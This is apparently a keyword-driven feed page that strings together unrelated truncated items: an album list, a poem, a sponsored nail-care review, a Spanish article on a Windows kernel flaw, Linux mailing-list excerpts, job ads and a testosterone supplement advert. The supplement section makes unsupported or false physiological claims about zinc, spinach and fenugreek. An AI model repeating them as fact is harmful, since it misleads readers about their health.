Takaakira “Taka”Goto - Classical Punk And Echoes Under The Beauty (Pelagic) Gratuit - Là (Kythibong/ Ego Twister) Rachel Grimes - The Clearing (Temporary Residence Ltd.) Haarvöl - Indite (Moving Furniture Records) Ha Det Bra - Societea For Two (Geenger/ PDV) Half Way Station - Dodo (Half Way Station) Tigran Hamasyan - Luys I Luso (ECM) The Hare And The Moon - Wood Witch (Reverb Worship) Anna von Hausswolff - The Miraculous (City Slang) Heezen - Abandoned Memory (Feutlab) Holly Herndon - Platform (4ad) Bas van Huizen - Kluwekracht (Moving Furniture) Jenny Hval - Apocalypse, Girl (Sacred Bones) Illuminine - #1 (Zeal) Insect Ark - Portal / Well (Autumnsongs) Angélique Ionatos - Reste La Lumière (Ici D’Ailleurs) Irfan - The Eternal Return (Prikosnovénie) Iskra String Quartet - Iskra (1631 Recordings) Jasmine Guffond - Yellow Bell (Sonic Pieces) Jerusalem In My Heart - If He Dies, If If If If If If If (cd, Constellation) Kammerflimmer Kollektief - Désarroi (Staubgold) Devrim Kavalli - Dal Dala (Kalan) Julia Kent - Asperities (Leaf) Boris Kovač - Times Of Day (ReR Megacorp) Kreng - The Summoner (Miasmah) Księżyc - Rabbit Eclipse (Penultimate Press) Lakker - Tundra (R&S) Adrian Lane - Branches Never Remember (Preserved Sound) Sinnika Langeland - The Half-Finished Heaven (ECM) Lara Leliane - Free (Homerecords.be) Lotte Kestner - Covering Depeche Mode (Saint-Loup) Sara Lov - Some Kind Of Champion (Splinter) Low - Ones And Sixes (Sub Pop) Luno - Close To Silence (Indies Scope) Mansfield TYA - Corpo Inferno (Vicious Circle) Bérangère Maximin - Dangerous Objects (Crammed) Microwolf - You Better Go Now (Esc.rec) Le Millipede - Le Millipede (Alien Transistor) Mist - The Loop Of Love (Skipping Records) Mountaineer - 1974 (Off Amsterdam) Mount Eerie - Sauna (7 e.p.) Myrkur - M (Relapse) Nordic Giants - A Séance Of Dark Delusions (Kscope) Olan Mill - Cavade Morlem (Dronarivm) Oneohtrix Point Never - Garden Of Delete (Warp) Other Lives - Rituals (Tbd) Öxxö Xööx - Nämïdäë (Blood Music) Padna - Alku Toinen (Aagoo/REV. Lab) A Place To Bury Stranger - Transfixiation (Dead Oceans) Petrels - Flailing Tomb (Denovali) Point Quiet - Ways And Needs Of A Night Horse (Continental) Michael Price - Entanglement (Erased Tapes) Radůza - Marathon (Radůza Records) Lana Del Rey - Honeymoon (Polydor/Interscope) Max Richter - Sleep/ From Sleep (Deutsche Grammofon) Rimbaud - Rimbaud (Gusstaff) Sannhet - Revisionist (The Flenser) Scalper - The Emporer’s Clothes (cd, Jarring Effects) Second Moon Of Winter - One For Sorrow, Two For Joy (Denovali) Seigmen - Enola (Indie Recordings/ Ikon) Dirk Serries & Rutger Zuydervelt - Buoyant (Consouling Sounds) Nadine Shah - Fast Food (Apollo) Simon Scott - Insomni (cd, Ash International) Siskiyou - Nervous (Constellation) The Slow Show - White Water (Haldern Pop) Snowapple - Illusion (Snowapple/ Debt/ ZIP) Snow Ghosts - A Wrecking (Houndstooth) The Soft Moon - Deeper (Captured Tracks) Sóley - Ask The Deep (Morr Music) Söll - Cävv (esc.rec) Colin Stetson And Sarah Neufeld - Never Were The Way She Was (Constellation) Sufjan Stevens - Carrie & Lowell (Asthmatic Kitty) Subheim - Foray (Denovali) Templo Diez - Constellations (My First Sonny Weissmuller Recordings) Phil Tomsett - Broken Memory Machine (Fluid Audio) Torres - Sprinter (Partisan) The Unthanks - Mount The Air (Rabble Rouser) Vlimmer I & II - (Blackjack Illuminist) James Welburn - Hold (Miasmah) Bill Wells & Aidan Moffat - The Most Important Place In The World (Chemical Underground) Wire - Wire (Pink Flag) Chelsea Wolfe - Abyss (Sargent House) Savina Yannatou & Primavera En Salonico - Songs Of Thessaloniki (ECM)
          DECOMPASSION CHAMBER   

Today's post came about from the idea of someone needing assistance to end a relationship. The idea that they could not deal with the guilt of ending it. A play on words of decompression chamber: a decompassion chamber.
The poem was not straight forward. I had to remove a stanza [that I liked but] which confused the narrative.

I need a de-compassion chamber.
Want this guilt excised
before it can bubble up inside my brain
and bend my body back towards herself
who is crying at the end of this telephone line.

On/off – off/on
the light switch of my indecision
makes for a familiar circuit.
We settle for possible second best.
I may leave her yet.
I admire people who can sustain their poetic vision for more than twenty lines as I rarely can. That said any poem is only as long as the kernel of the idea will sustain.
Maggie Roche died recently. I was always a fan of The Roches. Especially the first and third albums. Here they are from 1983 singing Hammond Song.
And here they sing Mr. Sellack.
Until next time.

          Consumer Critique: Nail Care from Cutex   
I recently had a chance to try out a variety of products from Cutex.

I was actually shocked the first time I tried a glitter polish how hard it was to get the glitter off. It was crazy! The ultra-powerful remover really does help get it off quickly - much easier than traditional nail polish remover. I also like the fragrances of these polish removers; it's not nearly as strong as some standard removers.

The nail care products didn't make much difference for me, but I don't have a problem with my nails. However, they did help my daughter's (she tends to bite her nails which leads to cracking) and my mom's (she's always had nails that crack easily).


Cutex products provide comprehensive nail care - removers, hand care, nail strengtheners, and more. They even have products for helping remove stubborn colors that make nails sometimes look yellow after the polish has been removed. They're easy to use, a decent value, and can be found at a variety of stores, including mass merchandisers, online, and drug stores. See below for just some of the options available!


         Nourishing Nail Polish Remover contains a patented oil blend of flaxseed and perilla seed which is proven to condition nails while quickly removing all traces of nail polish.The non-drying formula with a sparkling peach fragrance contains apricot kernel oil to soften skin and vitamin E to neutralize free radicals and moisturize the skin around the nails.
·         Strength-Shield Nail Polish Remover contains vitamin B5 which improves the flexibility and strength of nails. Vitamin E neutralizes free radicals and moisturizes the skin around the nails while hydrolyzed silk proteins provide and retain moisture to help protect skin from dehydration. Lavender flower extract provides a calming scent, but it also has antifungal and antibacterial properties. 
·         Ultra-Powerful Remover contains a patented oil blend of flaxseed and perilla seed which is proven to nourish nails while removing the toughest polishes (including dark color and glitter).  Apricot kernel oil is rich in vitamin E to soften the skin.  A refreshing cucumber fragrance adds to the experience!
·         Swipe & Go Nail Polish Remover Pads provide no-mess polish removal with easy-to-use remover pads – perfect for on-the-go or at home.  The pads contain the Nourishing Nail Polish Remover formula to quickly remove nail color. The textured surface of the pad makes it easier to scrub off stubborn nail color, even gels and glitters!

Problem: Brittle & Peeling Nails
Solution: Cutex Intense Recovery
This all-in-one salon-strength treatment will heal weak nails back to health. Combined with the perfect blend of Sweet Almond OilJojoba Seed Oil &Rice Bran Oil, this formula deeply penetrates the skin and nails to strengthen and moisturize nails.  Apply twice daily to the nail and cuticle.

Problem: Cracked & Splitting Nails
Solution: Cutex BB Nail Concealer 
This unique formula instantly conceals nail damage while defending against peels, breaks and splits. The sheer, nude finish gives nails a nice neutral finish unlike many clear treatments.  Microbead Polymer works to fill in ridges and help defend against peels, breaks and splits while a blend of Arctic Berry Oils and Vitamin C & E condition nails. After removal on the fifth day, nails look healthier, brighter and feel stronger!

Problem: Uneven Nail Beds
Solution: Cutex Ridge Filler
Fill in uneven nail surfaces and conceal ridges with this unique formula withMicrobead Polymer that creates an even base for nail color to adhere to and prevent staining of dark polishes. Wear alone or under your chosen nail polish.


Problem: Dry Cuticles
Solution: Cutex Hydrating Cuticle Oil

Treat dry, rough cuticles with this non-greasy formula that provides instant hydration to the cuticles. A blend of Sweet Almond OilJojoba Seed Oil &Rice Bran Oil will leave cuticles soft, healthy and moisturized.

          USDS bug postmortem. Alternatively, what does the Linux kernel have to do with Cisco router firmware?   
- Source: www.reddit.com
          Project zero hace pública una vulnerabilidad en el kernel de windows   
Seguridad-Google-Project-Zero.png

Desde hace tiempo, Google cuenta con un grupo de expertos de seguridad, llamado Project Zero, que buscan constantemente fallos de seguridad en todo el software actual de manera que los responsables puedan solucionarlos antes de que lo descubran piratas informáticos que puedan utilizarlos con malas intenciones. Sin embargo, los plazos para solucionarlos no son ilimitados, sino que los desarrolladores, ya sea uno independiente como un gigante como Microsoft, tienen como máximo 90 días para lanzar el parche de seguridad o, de lo contrario, el fallo se hará público y pondrá en peligro a todos los usuarios, tal como acaba de ocurrir con el nuevo fallo de seguridad de Windows hecho público.



No es la primera vez que Google pone en evidencia a Microsoft (y en peligro a los usuarios) haciendo públicos fallos en su sistema operativo Windows, y tampoco será la última. Hace unas horas, los ingenieros de Project Zero hacían pública una nueva vulnerabilidad en el Kernel de Windows que podía permitir a un atacante evadir las medidas de seguridad y mitigación del sistema operativo con relativa facilidad.



Este fallo de seguridad fue descubierto el pasado mes de marzo por los ingenieros del grupo de Google y, acto seguido, fue reportado a Microsoft, quien lo solucionó y liberó su parche de seguridad con las últimas actualizaciones de seguridad de Windows de este mismo mes. Sin embargo, algo le ha pasado a Microsoft, y es que, aunque en teoría el parche debería haber solucionado la vulnerabilidad, esta sigue estando presente en todos los ordenadores y, al haberse agotado el plazo, finalmente se ha dado a conocer.



Tal como aseguran los ingenieros de Project Zero, esta vulnerabilidad puede permitir a cualquier usuario acceder a la memoria del Kernel de Windows y, con un sencillo exploit, saltarse los sistemas de protección y mitigación de amenazas del sistema operativo. La vulnerabilidad ha sido considerada como de peligrosidad media y, según parece, solo afecta a los usuarios de las versiones de 32 bits de Windows, desde Windows 7 hasta Windows 10.



Microsoft no tiene prisa en solucionar esta vulnerabilidad en Windows, y el parche puede atrasarse hasta después de verano



Microsoft solucionó el fallo de seguridad, sin embargo, por algún motivo, este fallo ha seguido presente en los sistemas, por lo que Google finalmente lo ha hecho público tal como promete su programa.



Lo lógico, si Microsoft se ha equivocado al lanzar el parche de seguridad, es que lance uno nuevo, si no es antes de tiempo (al no ser una vulnerabilidad conocido o de peligrosidad alta), lo antes posible, por ejemplo, con el lanzamiento de los siguientes parches de seguridad previstos para el próximo 11 de julio. Sin embargo, Microsoft ha a asegurado no tener ninguna prisa en solucionar la vulnerabilidad.



Por ello, salvo que Microsoft se arrepienta y finalmente sí que solucione el fallo, es posible que ni en las actualizaciones de seguridad de julio ni en las de agosto veamos este parche de seguridad que soluciona esta nueva vulnerabilidad.



Como hemos dicho, la vulnerabilidad solo afecta a los sistemas de 32 bits, por lo que, si nuestro Windows es de 64 bits, no tenemos de qué preocuparnos.



https://www.redeszone.net/2017/06/28/project-zero-vulnerabilidad-kernel-windows/
          Former Husky Marzi’s contract purchased by Twins   
The former UConn pitcher gets a second chance with an MLB organization. For the past two seasons, former UConn Huskies pitcher and Berlin, Connecticut native Anthony Marzi has pitched close to home for the independent New Britain Bees of the Atlantic League. But now, Marzi will get another chance to impress a Major League Baseball organization. Due to injuries with their Single-A club in Cedar Rapids, Iowa, the Minnesota Twins have purchased the contract of Marzi from the Bees. It’s expected that Marzi will step into the Cedar Rapids Kernels rotation. Marzi was undrafted out of UConn after the 2014 season but signed with the New York Yankees in the winter of 2015. He pitched six games for the Yankees Gulf Coast League team where he allowed just three hits in 7 1⁄3 innings over six appearances. After being released by the Yankees in March of 2016, he tried out for the Bees and made the club out of their spring training. In two seasons for the side from hard-hitting New Britain, Marzi has a 10-6 record,
          Comment on Installing Linaro for a Beagle xM by Michael Hudson   
Sorry for the delay in moderation! The answer is no, not really. Linaro is an effort to improve the Linux on ARM experience, so we do work upstream in the kernel and gcc for example. As a demo and to validate our work, we produce installable images (which are based on Ubuntu) but that's not the end goal. We do also work with downstreams such as Ubuntu and OpenEmbedded and so on to help them make use of what we provide.
          TuxMachines: Servers: Containers, Ansible, and Puppet   
  • Kubernetes 1.7 Improves Container Security and API Aggregation

    The open-source Kubernetes 1.7 release is now available, providing users with new features to help manage and secure container infrastructure.

    Kubernetes 1.7 is the second major release of the open-source container orchestration platform so far in 2017 and follows the Kubernetes 1.6 release that debuted in March at the CloudNative Con/Kubecon event in Berlin, Germany. The Kubernetes project was first developed by Google and has been an open-source project run by the Linux Foundation's Cloud Native Computing Foundation (CNCF) since July 2015.

  • Why Portability is Not the Same Thing as Compatibility

    The Container Host *is* the Container Engine, and Container Image Compatibility Matters

    Have you ever wondered, how are containers are so portable? How it’s possible to run Ubuntu containers on CentOS, or Fedora containers on CoreOS? How is it that all of this just magically works? As long as I run the docker daemon on all of my hosts, everything will just work right? The answer is….no. I am here to break it to you – it’s not magic. I have said it before, and I will say it again, containers are just fancy Linux processes. There is not even a container object in the Linux kernel, there never has been. So, what does all of this mean?

  • LinchPin: A simplified cloud orchestration tool using Ansible

    Late last year, my team announced LinchPin, a hybrid cloud orchestration tool using Ansible. Provisioning cloud resources has never been easier or faster. With the power of Ansible behind LinchPin, and a focus on simplicity, many cloud resources are available at users' fingertips. In this article, I'll introduce LinchPin and look at how the project has matured in the past 10 months.

    Back when LinchPin was introduced, using the ansible-playbook command to run LinchPin was complex. Although that can still be accomplished, LinchPin now has a new front-end command-line user interface (CLI), which is written in Click and makes LinchPin even simpler than it was before.

  • Building Puppet's unofficial forge community

    A Puppet module might only be some 500 lines of code and a bunch of tests, but that doesn't mean it's effortless to maintain. Puppet modules should run on a range of operating systems and support a range of Puppet versions (and hence, Ruby versions)—and that in and of itself makes it quite challenging.

    So while a single person could easily write a Puppet module, what happens when that person gets sick? Changes jobs? Or simply loses interest?

read more


          TuxMachines: What Motivates Torvalds, What Excites Larabel About Linux, and Latest Linux Foundation Announcements   
  • Video: Linus Torvalds Explains How Linux Still Surprises and Motivates Him

    Linus Torvalds took to the stage in China for the first time Monday at LinuxCon + ContainerCon + CloudOpen China in Beijing. In front of a crowd of nearly 2,000, Torvalds spoke with VMware Head of Open Source Dirk Hohndel in one of their famous “fireside chats” about what motivates and surprises him and how aspiring open source developers can get started. Here are some highlights of their talk.

  • What Excites Me The Most About The Linux 4.12 Kernel

    If all goes according to plan, the Linux 4.12 kernel will be officially released before the weekend is through. Here's a recap of some of the most exciting changes for this imminent kernel update.

  • The Linux Foundation Announces 18 New Silver Members

    With the support of its members, The Linux Foundation hosts open source projects across technologies including networking, security, cloud, blockchain and more. This collaborative development model is helping technology advance at a rapid pace in a way that benefits individuals and organizations around the world.

  • Diversity Empowerment Summit Facilitates Inclusion and Culture Change

    Check out the session highlights for the new Diversity Empowerment Summit (DES), which will take place Sept. 14, 2017, in Los Angeles as part of Open Source Summit North America.

read more


          Device Driver Development Engineer - Intel - Singapore   
Knowledge of XDSL, ETHERNET switch, wireless LAN, Security Engine and microprocessor is an advantage. Linux Driver/Kernel development for Ethernet/DSL/LTE Modem...
From Intel - Sat, 17 Jun 2017 10:23:08 GMT - View all Singapore jobs
          Re: [GIT PULL 00/30] perf/core improvements and fixes   
Ingo Molnar writes: * Arnaldo Carvalho de Melo <acme@kernel.org> wrote: * Arnaldo Carvalho de Melo <acme@kernel.org> wrote: create mode 100644 tools/perf/scripts/python/intel-pt-events.py Pulled, thanks a lot Arnaldo!
Pulled, thanks a lot Arnaldo!
Ingo
Ingo
Ingo

          Re: [PATCH v6 05/21] net-next: stmmac: Add dwmac-sun8i   
Corentin Labbe writes: (Summary) On Tue, Jun 27, 2017 at 10:37:34AM -0700, Florian Fainelli wrote: discussions a little later today.
Hello
Hello
I wait for your comment before sending my reverts patch for http://www.mail-archive.com/linux-kernel@vger.kernel.org/msg1431579.html Could you confirm that internal is only meant for "non xMII internal protocol" Could you confirm that internal is only meant for "non xMII internal protocol" Regards
Regards
Regards

          [PATCH tip/perf/core 3/7] perf probe: allow placing uprobes in alt ...   
Krister Johansen writes: (Summary) + } } static int convert_exec_to_group(const char *exec, char **result) @@ -366,7 +372,8 @@ static int kernel_get_module_dso(const char *module, struct dso **pdso) static int find_alternative_probe_point(struct debuginfo *dinfo, struct perf_probe_point *pp, struct perf_probe_point *result, - const char *target, bool uprobes) + const char *target, struct nsinfo *nsi, + bool uprobes) { struct map *map = NULL;
          Re: [RFC][PATCHv3 2/5] printk: introduce printing kernel thread   
Sergey Senozhatsky writes: (Summary) that care to limit how much time printk can stop a CPU by, with the > there's no holder of console lock, the critical thread takes control > All prints will be in critical > an NMI safe lock in printk (like Peter Zijlstra and I have patches for > Which checks if the current CPU owns the spin lock, > the current CPU has the lock, then the NMI handle does the printing > without locking, not caring if it screws up the thread that is currently >
          Re: [PATCH v2] ACPI: surface3_power: MSHW0011 rev-eng implementation   
Sebastian Reichel writes: (Summary) Hi,
Hi,
On Thu, Jun 29, 2017 at 02:10:09PM +0200, Benjamin Tissoires wrote: + bix->design_capacity = le16_to_cpu(ret);
i2c_smbus_read_word_data() returns native endianess for little-endian bus (it basically has builtin le16_to_cpu). Your conversion actually _breaks_ support on big endian machines by converting it back.
machines by converting it back.
That seems to be a common mistake in the kernel and it might be a good idea to add some Coccinelle script for it?
it?
-- Sebastian
-- Sebastian
[unhandled content-type:application/pgp-signature]
          Re: [PATCH] kbuild: modpost: Warn about references from rodata to ...   
Rob Clark writes: (Summary) the explosions you get with these mistakes when building drivers as modules in a distro kernel config are quite "fun" to debug..
debug..
I'm not quite sure about the rules for whether merging this would count as a regression, but I would argue those drivers are already broken, just no one noticed yet. So I wouldn't be against merging this first to force drivers to fix their crap ;-)
first to force drivers to fix their crap ;-)
BR,
-R
-R
a Linux Foundation Collaborative Project
a Linux Foundation Collaborative Project

          Re: [HMM 12/15] mm/migrate: new memory migration helper for use wi ...   
Evgeny Baskakov writes: (Summary) Instead, it unconditionally suggests checking if the MIGRATE_PFN_VALID and MIGRATE_PFN_MIGRATE flags are set.
such pages the respective 'src' PFN entries are always set to 0 without any flags.
page in the 'src' entry, and ignores any flags in such case: which would be more logical, migrate_vma could keep the zero in the PFN entries for not allocated pages, but set the MIGRATE_PFN_MIGRATE flag anyway.
NVIDIA
Hi Jerome,
Hi Jerome,
It seems that the kernel can pass 0 in src_pfns for pages that it cannot migrate (i.e.
          Pattern of black screens with Linux on newer laptops.   
"David F." writes: (Summary) Using up to and including 4.11.7 getting reports coming in of black screens on new laptops (includes booting to console only). The solution is to use kernel parameter acpi=off. (although searching Internet even older system affected like HP Envy 17 j053ea and others that pci=noacpi is enough to get it working). Be nice for Linux to "just work" on these systems without special kernel parameters. work" on these systems without special kernel parameters. work" on these systems without special kernel parameters.
          did vfs_read or something related to it get broken?   
"David F." writes: (Summary) Hi,
Hi,
I have a driver that reads data from a file that has worked from kernel 3.x up to 4.9.13. int driver_file_read(struct file *file, unsigned char *data, unsigned int size) { int ret; } struct file *driver_file_open(const char *path, int flags, int mode, int *err) { int ec=0; } // update callers error code if (err) { *err=ec; } // return pointer to file return (filp);
          Re: [PATCH] kmod: add dependencies for test module   
"Luis R. Rodriguez" writes: On Fri, Jun 30, 2017 at 05:47:44PM +0200, Arnd Bergmann wrote: Signed-off-by: Arnd Bergmann <arnd@arndb.de>
Acked-by: Luis R. Rodriguez <mcgrof@kernel.org> Acked-by: Luis R. Rodriguez <mcgrof@kernel.org> Luis
Luis
Luis

          Cavaness' single leads Cedar Rapids to 6-2 win over Clinton   
CLINTON, Iowa - Christian Cavaness hit a two-run single in the seventh inning, leading the Cedar Rapids Kernels to a 6-2 win over the Clinton LumberKings on Friday.
          (USA-WA-Redmond) Senior Software Engineer   
We are a team in Azure Compute responsible for providing persistency by utilizing exabytes of storage in Microsoft datacenters. Our software aggregates disk space and makes it available to customers as block storage (disks of any size – currently from 1 GB to 320 Petabytes), or relational storage (highly available SQL databases). Our technology is uniquely interesting because it touches all levels of software stack - from the Windows kernel storage drivers to massively replicated, PAXOS-based distributed system that coordinates global storage allocation. Our team subscribes to all modern paradigms of software development - we roll out to production every week, we code-review every change, we use cloud build/test pipeline, we design high-scale, loosely coupled systems with built-in fail-safe and self-healing mechanisms, we do copious amount of production debugging, testing and monitoring, and we collect the data before writing code. And we have been doing it for the last five years. We are looking for senior and principal engineers who can help us take the system to the next level: expose it for wide usage in Azure, scale up to the next order of magnitude (from exabytes currently), and optimize distribution algorithms for Azure datacenters. You should be able to quickly learn several large codebases, produce simple solutions for real problems, implement them efficiently, and patiently guide production deployments to success. Why should you work on our team? Our technology is one of the top three most advanced systems in its field on the planet. If you love storage and/or distributed systems, this is the system to work on. If you have expertise in operating systems development, and would like to expand into distributed systems, or vice versa, this is a great opportunity to capitalize on your existing expertise while learning the other universe. We have the resources of a huge, powerful company behind it, but none of the bureaucratic overhead that is often associated with it. We are at the tip of tens of billions of dollars the company is investing in software services in general, and Azure in particular. You will work with brilliant people on a project that directly impacts thousands of developers, and indirectly impacts hundreds of millions of customers. You will learn new things, and share your knowledge with us. Interested? Drop us your resume and we will be happy to talk more! Preferred Qualifications: •Distributed systems, or operating systems kernel and driver development. •Experience with the Windows Storage stack and SQL Server is preferred •C++ (on a scale from one to ten where Stroustrup is eight, we expect you to be no less than five). Basic Qualifications: •5+ years of commercial software development experience “You will be required to pass Microsoft background checks prior to the start of employment and periodically thereafter. Further details regarding this process will be provided in follow up correspondence.” Ability to meet Microsoft, customer and/or government security screening requirements are required for this role. These requirements include, but are not limited to the following specialized security screenings: Microsoft Cloud Background Check: This position will be required to pass the Microsoft Cloud background check upon hire/transfer and every two years thereafter. Microsoft is an equal opportunity employer. All qualified applicants will receive consideration for employment without regard to age, ancestry, color, family or medical care leave, gender identity or expression, genetic information, marital status, medical condition, national origin, physical or mental disability, political affiliation, protected veteran status, race, religion, sex (including pregnancy), sexual orientation, or any other characteristic protected by applicable laws, regulations and ordinances. If you need assistance and/or a reasonable accommodation due to a disability during the application or the recruiting process, please send a request to askstaff@microsoft.com. Development (engineering)
          (USA-WA-Redmond) Principal Software Engineer   
We are a team in Azure Compute responsible for providing persistency by utilizing exabytes of storage in Microsoft datacenters. Our software aggregates disk space and makes it available to customers as block storage (disks of any size – currently from 1 GB to 320 Petabytes), or relational storage (highly available SQL databases). Our technology is uniquely interesting because it touches all levels of software stack - from the Windows kernel storage drivers to massively replicated, PAXOS-based distributed system that coordinates global storage allocation. Our team subscribes to all modern paradigms of software development - we roll out to production every week, we code-review every change, we use cloud build/test pipeline, we design high-scale, loosely coupled systems with built-in fail-safe and self-healing mechanisms, we do copious amount of production debugging, testing and monitoring, and we collect the data before writing code. And we have been doing it for the last five years. We are looking for senior and principal engineers who can help us take the system to the next level: expose it for wide usage in Azure, scale up to the next order of magnitude (from exabytes currently), and optimize distribution algorithms for Azure datacenters. You should be able to quickly learn several large codebases, produce simple solutions for real problems, implement them efficiently, and patiently guide production deployments to success. Why should you work on our team? Our technology is one of the top three most advanced systems in its field on the planet. If you love storage and/or distributed systems, this is the system to work on. If you have expertise in operating systems development, and would like to expand into distributed systems, or vice versa, this is a great opportunity to capitalize on your existing expertise while learning the other universe. We have the resources of a huge, powerful company behind it, but none of the bureaucratic overhead that is often associated with it. We are at the tip of tens of billions of dollars the company is investing in software services in general, and Azure in particular. You will work with brilliant people on a project that directly impacts thousands of developers, and indirectly impacts hundreds of millions of customers. You will learn new things, and share your knowledge with us. Interested? Drop us your resume and we will be happy to talk more! Preferred Qualifications: •Distributed systems, or operating systems kernel and driver development. •Experience with the Windows Storage stack and SQL Server is preferred •C++ (on a scale from one to ten where Stroustrup is eight, we expect you to be no less than five). Basic Qualifications: •5+ years of commercial software development experience Microsoft is an equal opportunity employer. All qualified applicants will receive consideration for employment without regard to race, color, gender, sexual orientation, gender identity or expression, religion, national origin, marital status, age, disability, veteran status, genetic information, or any other protected status. Microsoft is an equal opportunity employer. All qualified applicants will receive consideration for employment without regard to race, color, sex, sexual orientation, gender identity or expression, religion, national origin or ancestry, age, disability, marital status, pregnancy, protected veteran status, protected genetic information, political affiliation, or any other characteristics protected by local laws, regulations, or ordinances. “You will be required to pass Microsoft background checks prior to the start of employment and periodically thereafter. Further details regarding this process will be provided in follow up correspondence.” Ability to meet Microsoft, customer and/or government security screening requirements are required for this role. These requirements include, but are not limited to the following specialized security screenings: Microsoft Cloud Background Check: This position will be required to pass the Microsoft Cloud background check upon hire/transfer and every two years thereafter. Microsoft is an equal opportunity employer. All qualified applicants will receive consideration for employment without regard to age, ancestry, color, family or medical care leave, gender identity or expression, genetic information, marital status, medical condition, national origin, physical or mental disability, political affiliation, protected veteran status, race, religion, sex (including pregnancy), sexual orientation, or any other characteristic protected by applicable laws, regulations and ordinances. If you need assistance and/or a reasonable accommodation due to a disability during the application or the recruiting process, please send a request to askstaff@microsoft.com. Development (engineering)
          (USA-WA) Staff Engineer – Samsung Mobile R&D Lab   
**General Description** Samsung R&D; Lab in Bellevue, WA is looking for talented Mobile Software Engineers for supporting Samsung’s mobile product commercialization and advanced service development with US carriers. Established in June 2011 as a local lab of Samsung R&D;, the lab owns advanced technology collaboration with wireless carriers in the broad communication, computing, and entertainment domains covering technologies such as mobile wireless communication, big data, AR/VR, and AI. The lab is also responsible for carrier technical requirement analysis, architecture design and feature implementation of software services on device and in the cloud. We need software development engineers who are passionate about mobile technologies, software and services in the mobile and cloud space, as well as creating cutting edge innovations for Samsung’s next generation products and services, in the cloud and on devices. A Staff Software Engineer with the lab will play a technical lead role in many aspects of device engineering: requirement analysis, architecture design, implementation and commercialization of specific features on Android and Tizen devices, as well as debugging and resolving device issues across OS layers. The role is expected to provide technical guidance to junior engineers on software architecture, design patterns, engineering best practice, as well as task prioritization and professional communication internally and externally. Job Duties * As a Staff Engineer with full stack development experience, identify and propose innovations and new services, perform deep requirement analysis and software architecture design. Develop both server side and client side architecture and functional specifications by utilizing best design patterns and coding standards. Provide guidance to the team in designing, developing and test planning throughout the entire engineering process with emphasis on design for usability, performance, scalability, testability and code coverage. * Mentor and manage junior engineers on complex issue analysis, architecture, design and development. * Perform root cause analysis of technical issues by leveraging deep expertise in broad mobile embedded system areas such as Android application performance, Android Framework, mobile OS internals, Linux kernel, system battery performance, system stability, and so on. * Evaluate internal engineering process and identify improvement for better software quality and shorter time to market. **Necessary Skills / Attributes** * Industry candidates are required to have at least 6 years of post-bachelor experience on mobile embedded systems (Android preferred) and/or server/services development. * Design, develop, unit test and deploy Android based solutions using common standards and frameworks. * Solid knowledge of Android SDK, understands the fundamentals of what makes good app design and can show examples of this. * Understanding of core Java &/ C++ and OOD. * Excellent knowledge of fundamentals of computer science – operating systems, data structures, algorithms, and TCP/IP networking concept–is mandatory. * Excellent written and verbal communication skills. * BS/MS/Ph.D. degree in Computer Science or related technical field or equivalent practical experience. Preferred Qualifications * Candidates with demonstrable expertise in Android internals or with development experience with phone OEMs will be given preference. * Strong sense of project ownership required. Self-motivated and comfortable to learn and solve complicated problems in new technical areas under pressure. **Company Information** SAMSUNG ELECTRONICS AMERICA BIG THINGS HAPPEN HERE. The amazing products for which Samsung is known world-wide are the results of the amazing people who work here. Their talent, creativity, dedication, and commitment to innovation are what make us who we are. To continue to be a world leader in technology, we focus on attracting the best talent available and offer a corporate culture in which every individual can challenge themselves to discover how good they are, and how great they can become. Headquartered in Ridgefield Park, NJ, and with offices in Richardson, TX and Palo Alto, CA, Samsung Electronics America, Inc. (SEA) is a wholly-owned subsidiary of Samsung Electronics Co. Ltd. and a world leader in technology. We market a broad range of award-winning consumer electronics, smartphones, information systems, and home appliances. Samsung's philosophy is based on our strong determination for growth, perpetual innovation and responsibility to corporate citizenship. As a result of our commitment to innovation and unique design, the Samsung organization is one of the most decorated brands in the electronics industry. Our company is currently ranked #7 in Interbrand’s "100 Best Global Brands," and named #3 on the Boston Consulting Group list as one of the world's most innovative companies in 2014. At Samsung we work hard – every day. It is a fast-paced and challenging work environment, and we are a nimble team that constantly pushes ourselves to be the best. If you have energy, passion, dedication and drive, and you thrive in a fast-paced workplace, the rewards at Samsung are many. Imagine working for a global company that is a world leader in innovation, in an environment where exciting things happen every day. Imagine working with an amazing group of visionaries/ individuals who make products that bring joy to millions of people across the globe every single day. Imagine where you want to be, and who you want to be. At Samsung...the possibilities are limitless. Apply today and find out why LinkedIn ranked us as one of North America’s Most InDemand Employers in 2014. To this end, we follow various protocols during the recruitment process, including but not limited to, avoiding the inadvertent disclosure of confidential information of the applicant’s former employer. Samsung Electronics America provides Equal Employment Opportunity for all individuals regardless of race, color, religion, gender, age, national origin, marital status, sexual orientation, status as a protected veteran, genetic information, status as a qualified individual with a disability or any other characteristic protected by law. *Category:* S/W Engineering *Full-Time/Part-Time:* Regular Full-Time *Location:* , Bellevue Washington, Bellevue Washington, Bellevue Washington, Bellevue Washington
          EVOBOLIC - 240 caps   
Another more recent study (June of 2011) worked on 399 men in Tuscany, all of them over 65 years of age and observed that those who had less testosterone and less IGF-1 (insulin growth factor), presented a magnesium deficiency. (source)

Avena Sativa

Avena sativa (oat kernel) is known as a powerful aprodisiac (source) and stimulator of testosterone levels, as well as having multiple benefits, increasing energy levels, reducing anxiety...

Nettle extract

Nettle is capable of increasing levels of free testosterone, this testosterone, unlike the one linked to transportation proteins, is the “active” testosterone useful for causing the anticipated increase in strength and muscle mass.

Testofen® (fenugreek seed)

Testofen® is a patented fenugreek extract formula. Testofen has been shown to increase levels of free testosterone by up to 98% in an eight week trial with 60 people. (source)

Zinc

Zinc is an essential mineral and is required for the metabolic activity of 300 of the enzymes in the body and is deemed to be essential for cell division and the synthesis of DNA and proteins. These enzymes are involved in the metabolism of proteins, carbohydrates, fats and alcohol. Zinc is also a critical factor for the growth of tissues, healing of wounds, growth and maintenance of conjunctive tissue, the function of the immune system, the production of prostaglandins, bone mineralization, appropriate thyroid function, coagulation of blood, cognitive functions, foetal growth, the production of testosterone and sperm.

Spinach powder

Spinach powder is added to this precursor of testosterone given that spinach is rich in vitamin A and vitamin E. Said substances are potentiators to stimulate the body to increase the secretion of testosterone. On the other hand, the consumption of Zinc boosts the endogenous production of the male hormone par excellence, and said mineral is found in large quantities in spinach. This mineral prevents the conversion of testosterone into oestrogen (female sexual hormone), by inhibiting the aromatase enzyme. Zinc converts oestrogen into testosterone and increases the quantity of sperm.

Lactobacillus

It is considered to be a probiotic or beneficial bacteria for men and amongst many other functions, it is in charge of improving digestion and the digestibility of the supplements active principles. During digestion, it also helps with the production of vitamins such as niacin, folic acid and vitamin B6 (pyridoxine). Some studies show that L. acidophilus can help with the deconjugation and separation of amino acids.

Piperine
